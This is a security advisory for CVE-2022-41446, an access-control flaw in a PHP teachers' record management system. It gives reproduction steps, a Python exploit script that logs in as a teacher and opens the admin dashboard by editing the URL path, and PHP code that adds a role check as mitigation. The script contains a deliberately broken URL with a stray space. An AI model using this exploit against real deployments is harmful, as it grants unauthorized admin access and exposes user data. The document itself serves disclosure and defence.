CVE-2022-41446 - Escalation of Privileges in Teachers Record Management System Using CodeIgniter 1.0
Date: Nov 3, 2022
Vulnerability Type: Incorrect Access Control - Privilege Escalation
Vendor: Phpgurukul
Affected Product: Teachers Record Management System using CodeIgniter - 1.0
Description: A critical access control flaw exists in /Admin/dashboard.php of the Teachers Record Management System using CodeIgniter v1.0 (CVE-2022-41446). An authenticated low-privilege user can reach the admin dashboard and view or modify user data, resulting in escalation of privileges and information disclosure.
Steps to Reproduce:
- Log in with a user account in the Teachers Record Management System.
- Navigate to the user’s dashboard by accessing the URL: http://localhost/trms-ci/user/Users/dashboard.
- Modify the URL endpoint to admin/Admin/dashboard, creating the URL: http://localhost/trms-ci/admin/Admin/dashboard.
- Access the manipulated URL, granting unauthorized access to the admin dashboard.
- Observe and potentially modify user data within the admin dashboard.
Proof of Concept: View Proof of Concept
Exploit Code
# /*
# Authenticated Vertical Privilege Escalation Vulnerability
# Step 1: Log in with a teacher's credentials. Username: amit@gmail.com  Password: Test@123
# Step 2: Change user/User to admin/Admin in the URL path
# */
import argparse
import sys

import requests
from termcolor import cprint

color = "green"
cprint("[+] CVE-2022-41446 Authenticated Privilege Escalation in Teachers Record Management System v1.0", color)
cprint("[+] Author: RashidKhan Pathan aka iHexCoder", color)
cprint("[!] Usage: python3 exploit.py username password payload", color)
cprint("[!] Example: python3 exploit.py johndoe@gmail.com Test@123 admin/Admin", color)


class PrivilegeEscalation(object):
    color = "green"

    def __init__(self, username, password, payload):
        self.username = username
        self.password = password
        self.payload = payload

    def authentication(self):
        color = self.color
        cprint("[+] Authenticating User", color)
        cprint("[+] Username: " + self.username, color)
        cprint("[+] Password: " + self.password, color)
        cprint("[+] Payload: " + self.payload, color)
        login_url = "http://localhost/trms-ci/user/login"
        data = {
            "email": self.username,
            "password": self.password
        }
        login_response = requests.post(login_url, data=data)
        cprint("[+] Exploiting...Started", color)
        # A failed login lands back on the login page; a successful one is redirected elsewhere
        if "/user/login" in login_response.url:
            cprint("[+] Credentials are not valid", "red")
            sys.exit(1)
        cprint("[+] Authenticated Successfully as a Normal User", color)
        cprint("[+] Normal User URL Endpoint " + login_response.url, color)
        url = self.payload
        if self.payload != "admin/Admin":
            cprint("[+] Please Add Valid Payload", "red")
            sys.exit(1)
        # Keep the space here between r and d,
        # but remove the space between r and d in the URL
        response = requests.get(f"http://localhost/trms-ci/{url}/dashboar d")
        cprint("[+] Remove The Space Between r and d in URL", color)
        cprint("[+] Exploit Completed", color)
        cprint("[+] Accessed Admin Panel Successfully " + response.url, color)
        cprint("[+] Copy the URL and Replace the user/User/dashboard URL with " + response.url, color)
        cprint("[+] After Replacing it You Should see the Bypassed Admin Panel", color)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("username", help="Please Add Username", type=str)
    parser.add_argument("password", help="Please Add Password", type=str)
    parser.add_argument("payload", help="Please Add Payload", type=str)
    args = parser.parse_args()
    privilegeEscalation = PrivilegeEscalation(args.username, args.password, args.payload)
    privilegeEscalation.authentication()
Attack Vector: To exploit this vulnerability, an attacker must log in with a user account and manipulate the URL endpoint from user/Users/dashboard to admin/Admin/dashboard. This manipulation grants unauthorized access to the admin dashboard, allowing potential modification of user data.
Impact: This access control vulnerability poses a severe risk, enabling remote attackers to escalate privileges and potentially disclose sensitive information.
Reference:
Mitigation: To address this security flaw, it is crucial to implement robust access controls, ensuring that users can only access functionalities appropriate to their roles. Regular security assessments and audits are essential for identifying and remediating vulnerabilities in web applications.
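One way to enforce the role-appropriate access control described above in a CodeIgniter 3 style controller, as an added example and not the vendor's code: the MY_Controller base class, the session keys logged_in and role, the role value 'admin', and the file paths are assumptions, so use whatever the application's login controller actually stores.

```php
<?php
// application/core/MY_Controller.php  (assumed path; hypothetical base class)
defined('BASEPATH') OR exit('No direct script access allowed');

class MY_Controller extends CI_Controller
{
    // Abort the request unless the server-side session carries the expected role.
    // Session keys 'logged_in' and 'role' are assumptions. The role must come
    // from the session (set at login from the database), never from anything
    // the client sends, such as the URL path.
    protected function require_role($expected)
    {
        $this->load->library('session');
        $this->load->helper('url');
        if (!$this->session->userdata('logged_in')) {
            redirect('user/login');          // not authenticated at all
        }
        if ($this->session->userdata('role') !== $expected) {
            show_error('Forbidden', 403);    // authenticated, but wrong role
        }
    }
}

// application/controllers/admin/Admin.php  (assumed path)
class Admin extends MY_Controller
{
    public function __construct()
    {
        parent::__construct();
        // Likely shape of the bug (assumption, not the vendor's exact code):
        // only "is someone logged in?" is checked, so a teacher session passes.
        //   if (!$this->session->userdata('logged_in')) redirect('user/login');
        //
        // Hardened: require the admin role in the constructor so every action
        // in this controller, dashboard() included, is covered without relying
        // on each method to remember the check.
        $this->require_role('admin');
    }

    public function dashboard()
    {
        $this->load->view('admin/dashboard');
    }
}
```

Apply the same constructor check to every other admin controller, and add a regression test that logs in as a teacher and asserts that admin/Admin/dashboard returns 403 or redirects to the login page.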
Discoverer: RashidKhan Pathan